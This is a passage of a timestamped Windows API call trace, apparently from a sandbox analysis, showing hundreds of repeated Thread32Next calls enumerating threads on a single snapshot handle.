[0254.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.978] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.365] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.365] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.366] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.368] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.368] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.370] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.370] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.376] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.391] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.603] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.609] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.610] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.612] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.614] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.617] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.015] Thread32Next (hSnapshot=0x17c, 